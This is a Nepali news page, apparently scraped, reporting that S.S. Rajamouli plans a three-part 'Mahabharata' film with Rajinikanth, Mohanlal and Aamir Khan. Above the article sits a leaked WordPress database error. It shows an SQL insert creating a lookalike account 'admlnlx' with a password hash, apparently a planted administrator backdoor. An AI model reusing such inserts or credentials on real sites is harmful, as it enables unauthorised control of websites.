WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOpmhbONHhJGLE10nuv.Bdovrxi9XR1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 04:20:22', '', 'admlnlx', 'admlnlx')
भारत,माघ २७ –
एसएस राजामौलीले गरेर देखाए । जो कसैले सोचेको पनि थिएन । ‘बाहुबली २’ पछि उनी अर्को चलचित्र ‘महाभारत’ बनाउन गइरहेका छन् । यो चलचित्रका लागि तीन जनाको नाम फाइनल भइसकेको छ । ती तीन सुपरस्टार एकैसाथ देखिनेछन् ।
रजनीकान्त, मोहनलाल र आमिर खान राजामौलीको ‘महाभारत’को हिस्सा भइसकेका छन् ।
जो हिन्दी, तमिल र तेलुगु भाषामा बन्नेछ । यी अभिनेतासँगको साथमा यो भारतकै सबैभन्दा ठूलो चलचित्र हुनेछ । चलचित्रको बजेट ८०० करोड हुने भनिएको छ ।
यद्यपि यी तीन स्टारहरूले चलचित्रमा कस्तो भूमिका निर्वाह गर्ने छन्, यो अहिले तय भइसकेको छैन । आमिर खान यो चलचित्रमा कृष्णको भूमिकामा देखिन सक्छन् । यो चलचित्रसँगै भारतीय सिनेमा उद्योगले सबैभन्दा ठूलो प्रोजेक्ट पाएको छ ।
यदि यो प्रोजेक्ट तिनै ‘ड्रिमकास्ट’ सँग योजना बनाइएको हो भने यो खबरले फ्यानमा खुसी र उत्साह त्यति नै बढी देखिनेछ । र, बलिउडका लागि ठूलो कीर्तिमानी पनि हुनेछ ।
राजामौलीले यो प्रोजेक्टका बारेमा कुराकानी गर्दै चलचित्र तीन भागमा रिलिज हुने बताए । चलचित्र पूरा हुन ४–५ वर्ष लाग्नेछ । तर, उनी यो प्रोजेक्टमा संवेदनशीलताका साथ पूरा मिहिनेतका साथ लाग्नेछन् । चलचित्रले बक्सअफिसमा सुनामी ल्याउने अनुमान गरिएको छ ।
–फिल्मीबिट